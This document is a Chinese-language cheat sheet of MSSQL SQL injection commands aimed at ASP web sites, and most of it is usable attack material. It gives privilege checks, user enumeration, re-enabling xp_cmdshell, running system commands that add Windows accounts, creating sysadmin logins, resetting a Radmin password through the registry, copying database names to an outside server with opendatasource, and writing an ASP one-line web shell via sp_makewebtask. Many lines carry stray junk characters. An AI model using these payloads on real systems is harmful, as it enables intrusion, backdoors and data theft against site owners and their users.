阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
! L' T. x, T9 M% q" u/ ]7 e8 Rand 1=(Select IS_MEMBER('db_owner'))
# T6 O9 e' l0 oAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
7 I6 d7 e7 S& s" b
- f5 T6 J* o# b$ P' i//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
! y  E4 g4 J; R5 S8 j+ ^% K- G' and char(124)%2Buser%2Bchar(124)=0 and ''='
8 a/ w7 l( L7 g! _) @: Q1 C
6 d( g% ^$ J0 M; d+ t2 f  Y3 \搜索类型
; h' t- \+ y3 U' and char(124)%2Buser%2Bchar(124)=0 and '%'='

  v/ ^0 {. d9 K, ]爆用户名
3 \: Q$ q: f* _( X. V% Aand user>0
" E3 ^6 m  U  o+ E" D+ j9 s6 n- G* S8 G' and user>0 and ''='
2 v& t# \" A$ _
) s2 s0 ]9 F0 u3 J0 M检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
5 x9 g& m- R* T- g% `5 \And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

6 K9 z: B. N  {0 D+ a3 \4 |( N4 f6 ]检测是不是MSSQL数据库
4 Q$ Q  J( E' S2 ^4 X9 W- }and exists (select * from sysobjects);--
6 P. e4 _% [2 Z9 I
6 @+ t# b* K" @/ F. n( W1 z5 H检测是否支持多行
' `9 x  j; X: S' m;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

5 ^% U, k% H& @
& ~% l! T0 x. n2 [  ]' X8 t- Dselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

7 ?5 K! k5 V. d/ C, h& T//-----------------------
+ r8 ?! W$ l# F//      执行命令
! Q* c) L$ B' o( D/ b1 U2 \9 `//-----------------------
1 ?6 j& A3 k8 r9 H& ~( j. ]1 k2 \首先开启沙盘模式：
  O& k+ H* v% y6 }0 P  {6 y0 jexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
, C) c# j0 S1 E4 {. [8 W; b0 X
& z, S- I6 ^* C. Z/ k4 I$ o1 \然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
+ x2 X  G. V! U$ j;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
) @! \- [, h* A5 jexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ
/ u0 ~; p, |* z$ Z" F( p
5 Q# o8 w0 z* C2 G: h4 H读注册表
( w! t" h4 C$ j% H+ {2 [, [exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
) T- J# `3 E3 c3 ~) M
" E8 o2 O8 t: |+ {& W2 F8 v  X& U读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1

9 T, Z! V1 V$ u$ c4 E
  @0 \$ T4 h2 K3 p- V3 U7 `- n7 S数据库备份
: J. H: O) b9 b' l$ vbackup database pubs to disk = 'c:\123.bak'

# H1 m. U% W$ [/ ~- h//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--



更改sa口令方法：用sql综合利用工具连接后，执行命令：
$ C% v( C! h$ T3 o" Eexec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,ptlove
, h# Y" r! L9 wexec master.dbo.sp_addsrvrolemember test,sysadmin

% f5 I4 Z* U9 Y/ y- j$ r删除扩展存储过过程xp_cmdshell的语句:
) E% }/ q9 @" Q. Q, L1 k( Fexec sp_dropextendedproc 'xp_cmdshell'
  b8 ?$ u! v  o
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
5 _3 I) e! G( z2 z/ A7 v
" l1 o7 c$ I4 i1 [4 ?& Q! ]* B
停掉或激活某个服务。

* ~( h" _+ p9 x: E: n. M/ @exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
. h$ v5 G+ f, a2 \
0 h3 H: T! a, V0 F7 L. ~  Mdbo.xp_subdirs

7 l, m8 v1 t9 b8 x  Z& u4 U/ F只列某个目录下的子目录。
  N8 s* f5 [+ k1 g/ Pxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
1 O- u* J) k+ f'c:\test.cab','mszip',1,
( c% t* ]* r$ s# y' h3 X# ?3 S1 l'C:\Inetpub\wwwroot\SQLInject\login.asp',
2 A# A, N& @8 l  x# y% {'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

$ f( |3 u) f8 I6 q4 fxp_terminate_process
5 f; _6 c0 X4 F+ |) J# |7 h
# R. K7 ]1 O; r' P$ b( n停掉某个执行中的程序，但赋予的参数是 Process ID。
+ u/ y' |9 N6 L' _5 I! p利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484
+ l- C% n7 p+ a. z0 O% I- t; [
6 k, X8 ^8 \7 {4 k; H  D' M2 |xp_unpackcab
- \! c  u4 @& a/ B0 `1 m! s6 L
6 c$ i" V  ~4 H: D$ O解开压缩档。

  u9 ~+ t6 I* x" Fxp_unpackcab 'c:\test.cab','c:\temp',1

. J2 A5 {) M& i, j) O, f# d+ W
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
2 x% n9 a) o; Y
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
3 B$ L; o8 ~# `# Y
9 o4 s7 N/ q7 d+ B2 E& ^
/ [; T( K7 a$ O8 |5 R7 j6 H0 c& ]//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
; C7 r8 J  p, g7 L, ~http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

; s/ F; a) E  ]2 ?* A* Z//更新表内容
7 q/ \9 I6 h/ g  w7 f- _$ o* h+ PUpdate films SET kind = 'Dramatic' Where id = 123
7 X1 ^. i4 b. ^- F
' R( W  B9 w$ }5 N8 u9 V//删除内容
% d$ _' C- K. q: a5 q; ]& hdelete from table_name where Stockid = 3